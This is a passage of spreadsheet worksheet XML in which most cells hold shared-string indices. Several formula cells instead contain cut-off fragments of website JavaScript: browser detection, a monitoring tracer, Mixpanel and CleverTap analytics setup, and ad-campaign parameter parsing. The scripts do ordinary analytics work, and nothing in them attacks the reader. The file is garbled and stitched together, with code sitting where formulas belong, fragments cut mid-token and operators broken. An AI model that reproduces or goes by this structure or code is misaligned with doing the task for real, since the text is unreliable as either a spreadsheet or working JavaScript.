  / * ------------------------------------------------------</f>
        <v>0</v>
      </c>
    </row>
    <row r="11257" spans="1:2">
      <c r="A11257" t="s">
        <v>14</v>
      </c>
      <c r="B11257" t="s">
        <v>2472</v>
      </c>
    </row>
    <row r="11258" spans="1:2">
      <c r="A11258" t="s">
        <v>14</v>
      </c>
      <c r="B11258" t="s">
        <v>2473</v>
      </c>
    </row>
    <row r="11259" spans="1:2">
      <c r="A11259" t="s">
        <v>14</v>
      </c>
      <c r="B11259" t="s">
        <v>2474</v>
      </c>
    </row>
    <row r="11260" spans="1:2">
      <c r="A11260" t="s">
        <v>14</v>
      </c>
      <c r="B11260" t="s">
        <v>2475</v>
      </c>
    </row>
    <row r="11261" spans="1:2">
      <c r="A11261" t="s">
        <v>14</v>
      </c>
      <c r="B11261" t="s">
        <v>2476</v>
      </c>
    </row>
    <row r="11262" spans="1:2">
      <c r="A11262" t="s">
        <v>14</v>
      </c>
      <c r="B11262" t="s">
        <v>2477</v>
      </c>
    </row>
    <row r="11263" spans="1:2">
      <c r="A11263" t="s">
        <v>14</v>
      </c>
      <c r="B11263" t="s">
        <v>2478</v>
      </c>
    </row>
    <row r="11264" spans="1:2">
      <c r="A11264" t="s">
        <v>14</v>
      </c>
      <c r="B11264" t="s">
        <v>2479</v>
      </c>
    </row>
    <row r="11265" spans="1:2">
      <c r="A11265" t="s">
        <v>14</v>
      </c>
      <c r="B11265" t="s">
        <v>2480</v>
      </c>
    </row>
    <row r="11266" spans="1:2">
      <c r="A11266" t="s">
        <v>14</v>
      </c>
      <c r="B11266" t="s">
        <v>2481</v>
      </c>
    </row>
    <row r="11267" spans="1:2">
      <c r="A11267" t="s">
        <v>14</v>
      </c>
      <c r="B11267" t="s">
        <v>2482</v>
      </c>
    </row>
    <row r="11268" spans="1:2">
      <c r="A11268" t="s">
        <v>14</v>
      </c>
      <c r="B11268" t="s">
        <v>2483</v>
      </c>
    </row>
    <row r="11269" spans="1:2">
      <c r="A11269" t="s">
        <v>14</v>
      </c>
      <c r="B11269" t="s">
        <v>2484</v>
      </c>
    </row>
    <row r="11270" spans="1:2">
      <c r="A11270" t="s">
        <v>14</v>
      </c>
      <c r="B11270" t="s">
        <v>2485</v>
      </c>
    </row>
    <row r="11271" spans="1:2">
      <c r="A11271" t="s">
        <v>14</v>
      </c>
      <c r="B11271" t="s">
        <v>2486</v>
      </c>
    </row>
    <row r="11272" spans="1:2">
      <c r="A11272" t="s">
        <v>14</v>
      </c>
      <c r="B11272" t="s">
        <v>2487</v>
      </c>
    </row>
    <row r="11273" spans="1:2">
      <c r="A11273" t="s">
        <v>14</v>
      </c>
      <c r="B11273" t="s">
        <v>2488</v>
      </c>
    </row>
    <row r="11274" spans="1:2">
      <c r="A11274" t="s">
        <v>14</v>
      </c>
      <c r="B11274" t="s">
        <v>2489</v>
      </c>
    </row>
    <row r="11275" spans="1:2">
      <c r="A11275" t="s">
        <v>14</v>
      </c>
      <c r="B11275" t="s">
        <v>2490</v>
      </c>
    </row>
    <row r="11276" spans="1:2">
      <c r="A11276" t="s">
        <v>14</v>
      </c>
      <c r="B11276" t="s">
        <v>2491</v>
      </c>
    </row>
    <row r="11277" spans="1:2">
      <c r="A11277" t="s">
        <v>14</v>
      </c>
      <c r="B11277" t="s">
        <v>2492</v>
      </c>
    </row>
    <row r="11278" spans="1:2">
      <c r="A11278" t="s">
        <v>14</v>
      </c>
      <c r="B11278" t="s">
        <v>2493</v>
      </c>
    </row>
    <row r="11279" spans="1:2">
      <c r="A11279" t="s">
        <v>14</v>
      </c>
      <c r="B11279" t="s">
        <v>2494</v>
      </c>
    </row>
    <row r="11280" spans="1:2">
      <c r="A11280" t="s">
        <v>14</v>
      </c>
      <c r="B11280" t="s">
        <v>2495</v>
      </c>
    </row>
    <row r="11281" spans="1:2">
      <c r="A11281" t="s">
        <v>208</v>
      </c>
      <c r="B11281" t="s">
        <v>5022</v>
      </c>
    </row>
    <row r="11282" spans="1:2">
      <c r="A11282" t="s">
        <v>208</v>
      </c>
      <c r="B11282" t="s">
        <v>5023</v>
      </c>
    </row>
    <row r="11283" spans="1:2">
      <c r="A11283" t="s">
        <v>208</v>
      </c>
      <c r="B11283" t="s">
        <v>5024</v>
      </c>
    </row>
    <row r="11284" spans="1:2">
      <c r="A11284" t="s">
        <v>208</v>
      </c>
      <c r="B11284" t="s">
        <v>5025</v>
      </c>
    </row>
    <row r="11285" spans="1:2">
      <c r="A11285" t="s">
        <v>208</v>
      </c>
      <c r="B11285" t="s">
        <v>5026</v>
      </c>
    </row>
    <row r="11286" spans="1:2">
      <c r="A11286" t="s">
        <v>208</v>
      </c>
      <c r="B11286" t="s">
        <v>5027</v>
      </c>
    </row>
    <row r="11287" spans="1:2">
      <c r="A11287" t="s">
        <v>208</v>
      </c>
      <c r="B11287" t="s">
        <v>5028</v>
      </c>
    </row>
    <row r="11288" spans="1:2">
      <c r="A11288" t="s">
        <v>208</v>
      </c>
      <c r="B11288" t="s">
        <v>5029</v>
      </c>
    </row>
    <row r="11289" spans="1:2">
      <c r="A11289" t="s">
        <v>208</v>
      </c>
      <c r="B11289" t="s">
        <v>5030</v>
      </c>
    </row>
    <row r="11290" spans="1:2">
      <c r="A11290" t="s">
        <v>208</v>
      </c>
      <c r="B11290" t="s">
        <v>5031</v>
      </c>
    </row>
    <row r="11291" spans="1:2">
      <c r="A11291" t="s">
        <v>208</v>
      </c>
      <c r="B11291" t="s">
        <v>5032</v>
      </c>
    </row>
    <row r="11292" spans="1:2">
      <c r="A11292" t="s">
        <v>208</v>
      </c>
      <c r="B11292" t="s">
        <v>5033</v>
      </c>
    </row>
    <row r="11293" spans="1:2">
      <c r="A11293" t="s">
        <v>208</v>
      </c>
      <c r="B11293" t="s">
        <v>5034</v>
      </c>
    </row>
    <row r="11294" spans="1:2">
      <c r="A11294" t="s">
        <v>208</v>
      </c>
      <c r="B11294" t="s">
        <v>5035</v>
      </c>
    </row>
    <row r="11295" spans="1:2">
      <c r="A11295" t="s">
        <v>208</v>
      </c>
      <c r="B11295" t="s">
        <v>5036</v>
      </c>
    </row>
    <row r="11296" spans="1:2">
      <c r="A11296" t="s">
        <v>208</v>
      </c>
      <c r="B11296" t="s">
        <v>5037</v>
      </c>
    </row>
    <row r="11297" spans="1:2">
      <c r="A11297" t="s">
        <v>208</v>
      </c>
      <c r="B11297" t="s">
        <v>5038</v>
      </c>
    </row>
    <row r="11298" spans="1:2">
      <c r="A11298" t="s">
        <v>208</v>
      </c>
      <c r="B11298" t="s">
        <v>5039</v>
      </c>
    </row>
    <row r="11299" spans="1:2">
      <c r="A11299" t="s">
        <v>208</v>
      </c>
      <c r="B11299" t="s">
        <v>5040</v>
      </c>
    </row>
    <row r="11300" spans="1:2">
      <c r="A11300" t="s">
        <v>208</v>
      </c>
      <c r="B11300" t="s">
        <v>5041</v>
      </c>
    </row>
    <row r="11301" spans="1:2">
      <c r="A11301" t="s">
        <v>208</v>
      </c>
      <c r="B11301" t="s">
        <v>5042</v>
      </c>
    </row>
    <row r="11302" spans="1:2">
      <c r="A11302" t="s">
        <v>208</v>
      </c>
      <c r="B11302" t="s">
        <v>5043</v>
      </c>
    </row>
    <row r="11303" spans="1:2">
      <c r="A11303" t="s">
        <v>208</v>
      </c>
      <c r="B11303" t="s">
        <v>5044</v>
      </c>
    </row>
    <row r="11304" spans="1:2">
      <c r="A11304" t="s">
        <v>208</v>
      </c>
      <c r="B11304" t="s">
        <v>5045</v>
      </c>
    </row>
    <row r="11305" spans="1:2">
      <c r="A11305" t="s">
        <v>208</v>
      </c>
      <c r="B11305" t="s">
        <v>5046</v>
      </c>
    </row>
    <row r="11306" spans="1:2">
      <c r="A11306" t="s">
        <v>208</v>
      </c>
      <c r="B11306" t="s">
        <v>5047</v>
      </c>
    </row>
    <row r="11307" spans="1:2">
      <c r="A11307" t="s">
        <v>34</v>
      </c>
      <c r="B11307" t="s">
        <v>257</v>
      </c>
    </row>
    <row r="11308" spans="1:2">
      <c r="A11308" t="s">
        <v>209</v>
      </c>
      <c r="B11308" t="s">
        <v>5048</v>
      </c>
    </row>
    <row r="11309" spans="1:2">
      <c r="A11309" t="s">
        <v>209</v>
      </c>
      <c r="B11309" t="s">
        <v>5049</v>
      </c>
    </row>
    <row r="11310" spans="1:2">
      <c r="A11310" t="s">
        <v>209</v>
      </c>
      <c r="B11310" t="s">
        <v>5050</v>
      </c>
    </row>
    <row r="11311" spans="1:2">
      <c r="A11311" t="s">
        <v>209</v>
      </c>
      <c r="B11311">
        <f> null,x=null;const T=/Version\/(\S+)\s+Safari/;if(navigator.userAgent){var _=navigator.userAgent,S=_.match(T);S&amp;&amp;-1===_.indexOf("Chrome")&amp;&amp;-1===_.indexOf("Chromium")&amp;&amp;(A="Safari",x=S[1])}function j(e,t){if(!A)return!1;if(e!==A)return!1;if(!t)return!0;if(!x)return!1;for(var r=x.split(". "),n=t.split(".</f>
        <v>0</v>
      </c>
    </row>
    <row r="11312" spans="1:2">
      <c r="A11312" t="s">
        <v>209</v>
      </c>
      <c r="B11312" t="s">
        <v>5051</v>
      </c>
    </row>
    <row r="11313" spans="1:2">
      <c r="A11313" t="s">
        <v>209</v>
      </c>
      <c r="B11313" t="s">
        <v>5052</v>
      </c>
    </row>
    <row r="11314" spans="1:2">
      <c r="A11314" t="s">
        <v>209</v>
      </c>
      <c r="B11314" t="s">
        <v>5053</v>
      </c>
    </row>
    <row r="11315" spans="1:2">
      <c r="A11315" t="s">
        <v>209</v>
      </c>
      <c r="B11315" t="s">
        <v>5054</v>
      </c>
    </row>
    <row r="11316" spans="1:2">
      <c r="A11316" t="s">
        <v>209</v>
      </c>
      <c r="B11316" t="s">
        <v>5055</v>
      </c>
    </row>
    <row r="11317" spans="1:2">
      <c r="A11317" t="s">
        <v>209</v>
      </c>
      <c r="B11317" t="s">
        <v>1581</v>
      </c>
    </row>
    <row r="11318" spans="1:2">
      <c r="A11318" t="s">
        <v>209</v>
      </c>
      <c r="B11318" t="s">
        <v>5056</v>
      </c>
    </row>
    <row r="11319" spans="1:2">
      <c r="A11319" t="s">
        <v>209</v>
      </c>
      <c r="B11319" t="s">
        <v>5057</v>
      </c>
    </row>
    <row r="11320" spans="1:2">
      <c r="A11320" t="s">
        <v>209</v>
      </c>
      <c r="B11320" t="s">
        <v>5058</v>
      </c>
    </row>
    <row r="11321" spans="1:2">
      <c r="A11321" t="s">
        <v>209</v>
      </c>
      <c r="B11321" t="s">
        <v>5059</v>
      </c>
    </row>
    <row r="11322" spans="1:2">
      <c r="A11322" t="s">
        <v>209</v>
      </c>
      <c r="B11322" t="s">
        <v>5060</v>
      </c>
    </row>
    <row r="11323" spans="1:2">
      <c r="A11323" t="s">
        <v>209</v>
      </c>
      <c r="B11323" t="s">
        <v>5061</v>
      </c>
    </row>
    <row r="11324" spans="1:2">
      <c r="A11324" t="s">
        <v>209</v>
      </c>
      <c r="B11324">
        <f>w.prototype={createTracer:function(e,t){var r={},n=this,i="function"==typeof t;return(0,s.p)(y+"tracer",[(0,f.z)(),e,r],n,o.D.spa,v),function(){if(m.emit((i?"":"no-")+"fn-start",[(0,f.z)(),n,i],r),i)try{return t.apply(this,arguments)}catch(e){throw m.emit("fn-err",[arguments,this,"string"==typeof e?new Error(e):e],r),e}finally{m.emit("fn-end",[(0,f.z)()],r)}}}};function A(e,t,r,n){return function(){return(0,s.p)(p.xS,["API/"+t+"/called"],void 0,o. D.metrics,v),(0,s.p)(e+t,[(0,f.z)()].concat(i()(arguments)),r?null:this,n,v),r?void 0:this}}function x(){r.e(439).then(r.bind(r,5692)).then((t=&gt;{let{setAPI:r}=t;r(e),(0,d. L)(e,"api")})).catch((()=&gt;(0,g.</f>
        <v>0</v>
      </c>
    </row>
    <row r="11325" spans="1:2">
      <c r="A11325" t="s">
        <v>209</v>
      </c>
      <c r="B11325" t="s">
        <v>5062</v>
      </c>
    </row>
    <row r="11326" spans="1:2">
      <c r="A11326" t="s">
        <v>209</v>
      </c>
      <c r="B11326" t="s">
        <v>5063</v>
      </c>
    </row>
    <row r="11327" spans="1:2">
      <c r="A11327" t="s">
        <v>209</v>
      </c>
      <c r="B11327" t="s">
        <v>5064</v>
      </c>
    </row>
    <row r="11328" spans="1:2">
      <c r="A11328" t="s">
        <v>209</v>
      </c>
      <c r="B11328" t="s">
        <v>5065</v>
      </c>
    </row>
    <row r="11329" spans="1:2">
      <c r="A11329" t="s">
        <v>209</v>
      </c>
      <c r="B11329" t="s">
        <v>5066</v>
      </c>
    </row>
    <row r="11330" spans="1:2">
      <c r="A11330" t="s">
        <v>209</v>
      </c>
      <c r="B11330" t="s">
        <v>5067</v>
      </c>
    </row>
    <row r="11331" spans="1:2">
      <c r="A11331" t="s">
        <v>209</v>
      </c>
      <c r="B11331" t="s">
        <v>5068</v>
      </c>
    </row>
    <row r="11332" spans="1:2">
      <c r="A11332" t="s">
        <v>209</v>
      </c>
      <c r="B11332" t="s">
        <v>5069</v>
      </c>
    </row>
    <row r="11333" spans="1:2">
      <c r="A11333" t="s">
        <v>209</v>
      </c>
      <c r="B11333" t="s">
        <v>5070</v>
      </c>
    </row>
    <row r="11334" spans="1:2">
      <c r="A11334" t="s">
        <v>209</v>
      </c>
      <c r="B11334" t="s">
        <v>5071</v>
      </c>
    </row>
    <row r="11335" spans="1:2">
      <c r="A11335" t="s">
        <v>209</v>
      </c>
      <c r="B11335" t="s">
        <v>5072</v>
      </c>
    </row>
    <row r="11336" spans="1:2">
      <c r="A11336" t="s">
        <v>209</v>
      </c>
      <c r="B11336" t="s">
        <v>5073</v>
      </c>
    </row>
    <row r="11337" spans="1:2">
      <c r="A11337" t="s">
        <v>209</v>
      </c>
      <c r="B11337" t="s">
        <v>5074</v>
      </c>
    </row>
    <row r="11338" spans="1:2">
      <c r="A11338" t="s">
        <v>209</v>
      </c>
      <c r="B11338" t="s">
        <v>5075</v>
      </c>
    </row>
    <row r="11339" spans="1:2">
      <c r="A11339" t="s">
        <v>4</v>
      </c>
      <c r="B11339" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="11340" spans="1:2">
      <c r="A11340" t="s">
        <v>4</v>
      </c>
      <c r="B11340" t="s">
        <v>305</v>
      </c>
    </row>
    <row r="11341" spans="1:2">
      <c r="A11341" t="s">
        <v>4</v>
      </c>
      <c r="B11341" t="s">
        <v>306</v>
      </c>
    </row>
    <row r="11342" spans="1:2">
      <c r="A11342" t="s">
        <v>4</v>
      </c>
      <c r="B11342" t="s">
        <v>307</v>
      </c>
    </row>
    <row r="11343" spans="1:2">
      <c r="A11343" t="s">
        <v>4</v>
      </c>
      <c r="B11343" t="s">
        <v>308</v>
      </c>
    </row>
    <row r="11344" spans="1:2">
      <c r="A11344" t="s">
        <v>4</v>
      </c>
      <c r="B11344" t="s">
        <v>309</v>
      </c>
    </row>
    <row r="11345" spans="1:2">
      <c r="A11345" t="s">
        <v>4</v>
      </c>
      <c r="B11345" t="s">
        <v>310</v>
      </c>
    </row>
    <row r="11346" spans="1:2">
      <c r="A11346" t="s">
        <v>4</v>
      </c>
      <c r="B11346" t="s">
        <v>311</v>
      </c>
    </row>
    <row r="11347" spans="1:2">
      <c r="A11347" t="s">
        <v>4</v>
      </c>
      <c r="B11347" t="s">
        <v>312</v>
      </c>
    </row>
    <row r="11348" spans="1:2">
      <c r="A11348" t="s">
        <v>4</v>
      </c>
      <c r="B11348" t="s">
        <v>313</v>
      </c>
    </row>
    <row r="11349" spans="1:2">
      <c r="A11349" t="s">
        <v>4</v>
      </c>
      <c r="B11349" t="s">
        <v>314</v>
      </c>
    </row>
    <row r="11350" spans="1:2">
      <c r="A11350" t="s">
        <v>4</v>
      </c>
      <c r="B11350" t="s">
        <v>315</v>
      </c>
    </row>
    <row r="11351" spans="1:2">
      <c r="A11351" t="s">
        <v>210</v>
      </c>
      <c r="B11351" t="s">
        <v>5076</v>
      </c>
    </row>
    <row r="11352" spans="1:2">
      <c r="A11352" t="s">
        <v>210</v>
      </c>
      <c r="B11352" t="s">
        <v>5077</v>
      </c>
    </row>
    <row r="11353" spans="1:2">
      <c r="A11353" t="s">
        <v>210</v>
      </c>
      <c r="B11353" t="s">
        <v>5078</v>
      </c>
    </row>
    <row r="11354" spans="1:2">
      <c r="A11354" t="s">
        <v>210</v>
      </c>
      <c r="B11354" t="s">
        <v>5079</v>
      </c>
    </row>
    <row r="11355" spans="1:2">
      <c r="A11355" t="s">
        <v>210</v>
      </c>
      <c r="B11355" t="s">
        <v>5080</v>
      </c>
    </row>
    <row r="11356" spans="1:2">
      <c r="A11356" t="s">
        <v>210</v>
      </c>
      <c r="B11356">
        <f> null) {
        return mixpanel[trackerId];
      }
      const mixpanelConfig = {
        persistence: "localStorage",
        persistence_name: trackerId,
        debug: false
      }
      mixpanel.init("adda5f9b826b0035419cef2d53d055fc", mixpanelConfig, trackerId);
      mixpanel[trackerId].register({"distinct_id": trackerId});
      return mixpanel[trackerId];
    }
  &lt;/script&gt;
&lt;script type="text/javascript"&gt;
  $(document).ready(function () {
     try {
      if (! window. AUTO_EVENT_TRACKER_DISABLED &amp;&amp; !window.loadAnalyticsEventComplelte) {
         loadAnalyticsEvents();
         window.loadAnalyticsEventComplelte = true;
       }
     } catch(e) {
      console.log('SOMETHING WENT WRONG  -- 1');
     }
    if($('#account-type-screen-display-event').length ! = 0){
      element = $('#account-type-screen-display-event');
      account_type_screen_displayed_event(element.data('intent-type'), element.data('screen-type'));
    }
  });
  //Here</f>
        <v>0</v>
      </c>
    </row>
    <row r="11357" spans="1:2">
      <c r="A11357" t="s">
        <v>210</v>
      </c>
      <c r="B11357" t="s">
        <v>5081</v>
      </c>
    </row>
    <row r="11358" spans="1:2">
      <c r="A11358" t="s">
        <v>210</v>
      </c>
      <c r="B11358" t="s">
        <v>5082</v>
      </c>
    </row>
    <row r="11359" spans="1:2">
      <c r="A11359" t="s">
        <v>210</v>
      </c>
      <c r="B11359" t="s">
        <v>5083</v>
      </c>
    </row>
    <row r="11360" spans="1:2">
      <c r="A11360" t="s">
        <v>210</v>
      </c>
      <c r="B11360" t="s">
        <v>5084</v>
      </c>
    </row>
    <row r="11361" spans="1:2">
      <c r="A11361" t="s">
        <v>210</v>
      </c>
      <c r="B11361" t="s">
        <v>5085</v>
      </c>
    </row>
    <row r="11362" spans="1:2">
      <c r="A11362" t="s">
        <v>210</v>
      </c>
      <c r="B11362" t="s">
        <v>5086</v>
      </c>
    </row>
    <row r="11363" spans="1:2">
      <c r="A11363" t="s">
        <v>210</v>
      </c>
      <c r="B11363" t="s">
        <v>5087</v>
      </c>
    </row>
    <row r="11364" spans="1:2">
      <c r="A11364" t="s">
        <v>210</v>
      </c>
      <c r="B11364">
        <f>&gt; {
        console.log('Success:', data);
      })
      .catch((error) =&gt; {
        console.error('Error:', error);
      });
    } catch(e) {
        console.log('SOMETHING WENT WRONG -- apiCallerAnalyticsService');
    }
  }
  function trackClevertapEvent(event, properties){
    const AllowedEvents = ["Signed Up","Viewed Tiled Dashboard","Child Created","Interacted SplashCommunity Discoverability Pop-Up","Child Did - Session Started","Playable Clicked","Class Created","Assessment</f>
        <v>0</v>
      </c>
    </row>
    <row r="11365" spans="1:2">
      <c r="A11365" t="s">
        <v>210</v>
      </c>
      <c r="B11365" t="s">
        <v>5088</v>
      </c>
    </row>
    <row r="11366" spans="1:2">
      <c r="A11366" t="s">
        <v>210</v>
      </c>
      <c r="B11366" t="s">
        <v>5089</v>
      </c>
    </row>
    <row r="11367" spans="1:2">
      <c r="A11367" t="s">
        <v>210</v>
      </c>
      <c r="B11367">
        <f> -1){
      trackServerSide(event, properties, null, true);
    }
  }
  function account_type_screen_displayed_event(intent_type, screen_type){
    if (typeof(screen_type)==='undefined') screen_type = 'popup';
    var fromPage = $('#mixpanel-tracking-page-view').attr('data-name') || window.location.pathname.replace('/','');
    trackAnalyticsEvent('Account Type Screen Shown', {'Intent for': intent_type, 'Screen type': screen_type, 'From Page': fromPage});
  }
  function checkAndSetAddwordsUtmParams() {
    var query_params = window.location.search.substr(1).split('&amp;');
    if(query_params[0]) {
      $.each(query_params, function (index, element) {
        if(element.split('adCampaign=')[1]) {
          window.sm_addword_campaign = element.split('adCampaign=')[1];
          window.sm_addword_utms = true;
        }
        else if (element.split('adGroup=')[1]) {
          window.sm_addword_group = element.split('adGroup=')[1];
          window.sm_addword_utms = true;
        }
        else if (element.split('adTag=')[1]) {
          window.sm_addword_tag = element.split('adTag=')[1];
          window.sm_addword_utms = true;
        }
      });
    }
  }
  checkAndSetAddwordsUtmParams()
  function setSmAddwordUtms(properties) {
    if( window.sm_addword_campaign)
      properties['adCampaign'] = window.sm_addword_campaign;
    if( window.sm_addword_group)
      properties['adGroup'] = window.sm_addword_group;
    if( window.sm_addword_tag)
      properties['adTag'] = window.sm_addword_tag;
  }
&lt;/script&gt;
&lt;script&gt;
  window.dataLayer = window.dataLayer ||</f>
        <v>0</v>
      </c>
    </row>
    <row r="11368" spans="1:2">
      <c r="A11368" t="s">
        <v>210</v>
      </c>
      <c r="B11368" t="s">
        <v>5090</v>
      </c>
    </row>
    <row r="11369" spans="1:2">
      <c r="A11369" t="s">
        <v>210</v>
      </c>
      <c r="B11369" t="s">
        <v>5091</v>
      </c>
    </row>
    <row r="11370" spans="1:2">
      <c r="A11370" t="s">
        <v>210</v>
      </c>
      <c r="B11370" t="s">
        <v>5092</v>
      </c>
    </row>
    <row r="11371" spans="1:2">
      <c r="A11371" t="s">
        <v>210</v>
      </c>
      <c r="B11371" t="s">
        <v>5093</v>
      </c>
    </row>
    <row r="11372" spans="1:2">
      <c r="A11372" t="s">
        <v>210</v>
      </c>
      <c r="B11372" t="s">
        <v>5094</v>
      </c>
    </row>
    <row r="11373" spans="1:2">
      <c r="A11373" t="s">
        <v>210</v>
      </c>
      <c r="B11373" t="s">
        <v>5095</v>
      </c>
    </row>
    <row r="11374" spans="1:2">
      <c r="A11374" t="s">
        <v>210</v>
      </c>
      <c r="B11374" t="s">
        <v>5096</v>
      </c>
    </row>
    <row r="11375" spans="1:2">
      <c r="A11375" t="s">
        <v>210</v>
      </c>
      <c r="B11375" t="s">
        <v>5097</v>
      </c>
    </row>
    <row r="11376" spans="1:2">
      <c r="A11376" t="s">
        <v>210</v>
      </c>
      <c r="B11376" t="s">
        <v>5098</v>
      </c>
    </row>
    <row r="11377" spans="1:2">
      <c r="A11377" t="s">
        <v>170</v>
      </c>
      <c r="B11377" t="s">
        <v>4209</v>
      </c>
    </row>
    <row r="11378" spans="1:2">
      <c r="A11378" t="s">
        <v>170</v>
      </c>
      <c r="B11378" t="s">
        <v>4210</v>
      </c>
    </row>
    <row r="11379" spans="1:2">
      <c r="A11379" t="s">
        <v>170</v>
      </c>
      <c r="B11379" t="s">
        <v>4211</v>
      </c>
    </row>
    <row r="11380" spans="1:2">
      <c r="A11380" t="s">
        <v>211</v>
      </c>
      <c r="B11380" t="s">
        <v>5099</v>
      </c>
    </row>
    <row r="11381" spans="1:2">
      <c r="A11381" t="s">
        <v>211</v>
      </c>
      <c r="B11381" t="s">
        <v>5100</v>
      </c>
    </row>
    <row r="11382" spans="1:2">
      <c r="A11382" t="s">
        <v>211</v>
      </c>
      <c r="B11382" t="s">
        <v>5101</v>
      </c>
    </row>
    <row r="11383" spans="1:2">
      <c r="A11383" t="s">
        <v>211</v>
      </c>
      <c r="B11383" t="s">
        <v>5102</v>
      </c>
    </row>
    <row r="11384" spans="1:2">
      <c r="A11384" t="s">
        <v>211</v>
      </c>
      <c r="B11384" t="s">
        <v>5103</v>
      </c>
    </row>
    <row r="11385" spans="1:2">
      <c r="A11385" t="s">
        <v>211</v>
      </c>
      <c r="B11385" t="s">
        <v>5104</v>
      </c>
    </row>
    <row r="11386" spans="1:2">
      <c r="A11386" t="s">
        <v>211</v>
      </c>
      <c r="B11386" t="s">
        <v>5105</v>
      </c>
    </row>
    <row r="11387" spans="1:2">
      <c r="A11387" t="s">
        <v>211</v>
      </c>
      <c r="B11387" t="s">
        <v>5106</v>
      </c>
    </row>
    <row r="11388" spans="1:2">
      <c r="A11388" t="s">
        <v>211</v>
      </c>
      <c r="B11388" t="s">
        <v>1947</v>
      </c>
    </row>
    <row r="11389" spans="1:2">
      <c r="A11389" t="s">
        <v>211</v>
      </c>
      <c r="B11389" t="s">
        <v>1948</v>
      </c>
    </row>
    <row r="11390" spans="1:2">
      <c r="A11390" t="s">
        <v>211</v>
      </c>
      <c r="B11390" t="s">
        <v>1949</v>
      </c>
    </row>
    <row r="11391" spans="1:2">
      <c r="A11391" t="s">
        <v>211</v>
      </c>
      <c r="B11391" t="s">
        <v>1950</v>
      </c>
    </row>
    <row r="11392" spans="1:2">
      <c r="A11392" t="s">
        <v>211</v>
      </c>
      <c r="B11392" t="s">
        <v>5107</v>
      </c>
    </row>
    <row r="11393" spans="1:2">
      <c r="A11393" t="s">
        <v>211</v>
      </c>
      <c r="B11393" t="s">
        <v>1952</v>
      </c>
    </row>
    <row r="11394" spans="1:2">
      <c r="A11394" t="s">
        <v>211</v>
      </c>
      <c r="B11394" t="s">
        <v>1953</v>
      </c>
    </row>
    <row r="11395" spans="1:2">
      <c r="A11395" t="s">
        <v>211</v>
      </c>
      <c r="B11395" t="s">
        <v>1954</v>
      </c>
    </row>
    <row r="11396" spans="1:2">
      <c r="A11396" t="s">
        <v>211</v>
      </c>
      <c r="B11396" t="s">
        <v>1955</v>
      </c>
    </row>
    <row r="11397" spans="1:2">
      <c r="A11397" t="s">
        <v>211</v>
      </c>
      <c r="B11397" t="s">
        <v>1956</v>
      </c>
    </row>
    <row r="11398" spans="1:2">
      <c r="A11398" t="s">
        <v>211</v>
      </c>
      <c r="B11398" t="s">
        <v>1957</v>
      </c>
    </row>
    <row r="11399" spans="1:2">
      <c r="A11399" t="s">
        <v>211</v>
      </c>
      <c r="B11399" t="s">
        <v>1958</v>
      </c>
    </row>
    <row r="11400" spans="1:2">
      <c r="A11400" t="s">
        <v>211</v>
      </c>
      <c r="B11400" t="s">
        <v>663</v>
      </c>
    </row>
    <row r="11401" spans="1:2">
      <c r="A11401" t="s">
        <v>211</v>
      </c>
      <c r="B11401" t="s">
        <v>664</v>
      </c>
    </row>
    <row r="11402" spans="1:2">
      <c r="A11402" t="s">
        <v>211</v>
      </c>
      <c r="B11402" t="s">
        <v>665</v>
      </c>
    </row>
    <row r="11403" spans="1:2">
      <c r="A11403" t="s">
        <v>211</v>
      </c>
      <c r="B11403" t="s">
        <v>666</v>
      </c>
    </row>
    <row r="11404" spans="1:2">
      <c r="A11404" t="s">
        <v>211</v>
      </c>
      <c r="B11404" t="s">
        <v>1959</v>
      </c>
    </row>
    <row r="11405" spans="1:2">
      <c r="A11405" t="s">
        <v>211</v>
      </c>
      <c r="B11405" t="s">
        <v>1960</v>
      </c>
    </row>
    <row r="11406" spans="1:2">
      <c r="A11406" t="s">
        <v>211</v>
      </c>
      <c r="B11406" t="s">
        <v>1961</v>
      </c>
    </row>
    <row r="11407" spans="1:2">
      <c r="A11407" t="s">
        <v>211</v>
      </c>
      <c r="B11407" t="s">
        <v>1962</v>
      </c>
    </row>
    <row r="11408" spans="1:2">
      <c r="A11408" t="s">
        <v>211</v>
      </c>
      <c r="B11408" t="s">
        <v>1963</v>
      </c>
    </row>
    <row r="11409" spans="1:2">
      <c r="A11409" t="s">
        <v>211</v>
      </c>
      <c r="B11409" t="s">
        <v>5108</v>
      </c>
    </row>
    <row r="11410" spans="1:2">
      <c r="A11410" t="s">
        <v>211</v>
      </c>
      <c r="B11410" t="s">
        <v>5109</v>
      </c>
    </row>
    <row r="11411" spans="1:2">
      <c r="A11411" t="s">
        <v>211</v>
      </c>
      <c r="B11411" t="s">
        <v>5110</v>
      </c>
    </row>
    <row r="11412" spans="1:2">
      <c r="A11412" t="s">
        <v>211</v>
      </c>
      <c r="B11412" t="s">
        <v>5111</v>
      </c>
    </row>
    <row r="11413" spans="1:2">
      <c r="A11413" t="s">
        <v>211</v>
      </c>
      <c r="B11413" t="s">
        <v>5112</v>
      </c>
    </row>
    <row r="11414" spans="1:2">
      <c r="A11414" t="s">
        <v>211</v>
      </c>
      <c r="B11414" t="s">
        <v>5113</v>
      </c>
    </row>
    <row r="11415" spans="1:2">
      <c r="A11415" t="s">
        <v>211</v>
      </c>
      <c r="B11415" t="s">
        <v>5114</v>
      </c>
    </row>
    <row r="11416" spans="1:2">
      <c r="A11416" t="s">
        <v>211</v>
      </c>
      <c r="B11416" t="s">
        <v>5115</v>
      </c>
    </row>
    <row r="11417" spans="1:2">
      <c r="A11417" t="s">
        <v>211</v>
      </c>
      <c r="B11417" t="s">
        <v>5116</v>
      </c>
    </row>
    <row r="11418" spans="1:2">
      <c r="A11418" t="s">
        <v>211</v>
      </c>
      <c r="B11418" t="s">
        <v>5117</v>
      </c>
    </row>
    <row r="11419" spans="1:2">
      <c r="A11419" t="s">
        <v>211</v>
      </c>
      <c r="B11419" t="s">
        <v>5099</v>
      </c>
    </row>
    <row r="11420" spans="1:2">
      <c r="A11420" t="s">
        <v>211</v>
      </c>
      <c r="B11420" t="s">
        <v>5100</v>
      </c>
    </row>
    <row r="11421" spans="1:2">
      <c r="A11421" t="s">
        <v>211</v>
      </c>
      <c r="B11421" t="s">
        <v>5101</v>
      </c>
    </row>
    <row r="11422" spans="1:2">
      <c r="A11422" t="s">
        <v>211</v>
      </c>
      <c r="B11422" t="s">
        <v>5102</v>
      </c>
    </row>
    <row r="11423" spans="1:2">
      <c r="A11423" t="s">
        <v>211</v>
      </c>
      <c r="B11423" t="s">
        <v>5103</v>
      </c>
    </row>
    <row r="11424" spans="1:2">
      <c r="A11424" t="s">
        <v>211</v>
      </c>
      <c r="B11424" t="s">
        <v>5104</v>
